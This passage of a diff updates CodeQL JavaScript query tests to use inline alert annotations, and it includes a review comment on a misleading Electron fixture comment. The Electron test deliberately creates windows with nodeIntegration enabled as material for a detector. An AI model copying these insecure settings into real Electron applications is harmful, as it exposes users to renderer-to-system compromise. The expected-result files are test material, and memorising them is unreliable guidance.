true, nodeIntegrationInWorker: false, webSecurity: true, sandbox: true - } + } // $ Alert }; - var pref = { // NOT OK, implicitly enabled + var pref = { // implicitly enabled plugins: true, webSecurity: true, sandbox: true - }; + }; // $ Alert - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, 
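Review bot: The comment kept on `options_1` in EnablingNodeIntegration.js says `nodeIntegrationInWorker` enabled, but the object literal sets `nodeIntegrationInWorker: false`. The .expected row for 15:22:20:9 gives the actual reason: `nodeIntegration` is enabled by default because the key is absent. Since the line is rewritten anyway, state that reason: `var options_1 = { // nodeIntegration left unset (enabled by default); nodeIntegrationInWorker explicitly disabled`. A reader using this fixture to learn which Electron webPreferences are risky would otherwise come away with the wrong setting. The body of `test()` continues past this hunk.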
@@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref index b0315fd89ad5..d54f00166518 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref @@ -1 +1,2 @@ -Electron/EnablingNodeIntegration.ql +query: Electron/EnablingNodeIntegration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected 
@@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref index 07ff4053aefc..6dcd4ec7bef2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.qlref @@ -1 +1,2 @@ -Expressions/BitwiseSignCheck.ql \ No newline at end of file +query: Expressions/BitwiseSignCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..ef5d14506bc2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -1,23 +1,21 @@ function bitIsSet(x, n) { - return (x & (1< 0; + return (x & (1< 0; // $ Alert } console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // $ Alert - prints 'true' + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref index 37235c0e9dfd..ad4cbb7600e8 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.qlref @@ -1 +1,2 @@ -Expressions/CompareIdenticalValues.ql \ No newline at end of file +query: Expressions/CompareIdenticalValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..b8b1b4c85dcb 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js 
@@ -8,38 +8,37 @@ function Rectangle(x, y, width, height) { Rectangle.prototype.contains = function(x, y) { return (this.x <= x && x < this.x+this.width) && - (y <= y && + (y <= y && // $ Alert y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref index d8b4e6b39a53..9147587a96a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/ComparisonWithNaN.qlref @@ -1 +1,2 @@ -Expressions/ComparisonWithNaN.ql \ No newline at end of file +query: Expressions/ComparisonWithNaN.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js index 0e65c179d140..a2a4feec0f54 100644 --- a/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ComparisonWithNaN/tst.js @@ -1,9 +1,9 @@ -x == NaN; -x != NaN; -x === NaN; -NaN !== x; -x < NaN; -NaN === NaN; +x == NaN; // $ Alert +x != NaN; // $ Alert +x === NaN; // $ Alert +NaN !== x; // $ Alert +x < NaN; // $ Alert +NaN === NaN; // $ Alert isNaN(x); function f(x, NaN) { 
diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref index da7e874d5026..4c5c9f527628 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/DuplicateCondition.qlref @@ -1 +1,2 @@ -Expressions/DuplicateCondition.ql \ No newline at end of file +query: Expressions/DuplicateCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js index 11a0b8c824de..cce5ff36fcfc 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateCondition/tst.js @@ -1,7 +1,7 @@ function controller(msg) { if (msg == 'start') start(); - else if (msg == 'start') + else if (msg == 'start') // $ Alert stop(); else throw new Error("Message not understood."); diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref index 5a1301784da4..6c32a22906cd 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/DuplicateProperty.qlref @@ -1 +1,2 @@ -Expressions/DuplicateProperty.ql +query: Expressions/DuplicateProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js 
+++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js @@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js index 992f9bc5c8d7..c673055fbf71 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst2.js @@ -3,7 +3,7 @@ var o = { getX: function() { return this.x; - }, + }, // $ Alert setX: function(x) { this.x = x; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref index c63203f1a8ca..c95618b5b331 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/DuplicateSwitchCase.qlref @@ -1 +1,2 @@ -Expressions/DuplicateSwitchCase.ql \ No newline at end of file +query: Expressions/DuplicateSwitchCase.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js index aa635dec8bb8..8056a9f0e74d 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateSwitchCase/tst.js @@ -3,7 +3,7 @@ function controller(msg) { case 'start': start(); break; - case 'start': + case 'start': // $ Alert stop(); break; default: diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..853e781c88e2 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected 
@@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | -| uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | +| uselessfn.js:1:1:1:26 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref index 83e04904db2a..f4e3458759ba 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.qlref 
@@ -1 +1,2 @@ -Expressions/ExprHasNoEffect.ql \ No newline at end of file +query: Expressions/ExprHasNoEffect.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..a91759e553f1 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js 
+++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js 
@@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK /** Useless */ -x; +x; // $ Alert -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, "nonTrivialNonGetter1", 
getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js index e3634673ea58..341644bf6498 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/uselessfn.js @@ -1,3 +1,3 @@ -(function f() { +(function f() { // $ Alert console.log("I'm never called."); }) \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..60c9c95e2484 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected 
@@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. 
| tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. 
| tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. 
| tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. 
| tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. 
| tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:78:31:78:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:78:38:78:41 | null | an expression | +| tst.js:81:35:81:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ 